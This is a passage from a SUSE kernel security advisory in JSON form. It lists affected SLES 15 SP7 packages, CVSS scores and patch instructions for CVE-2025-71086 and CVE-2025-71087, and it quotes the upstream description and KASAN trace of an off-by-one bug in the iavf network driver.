"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
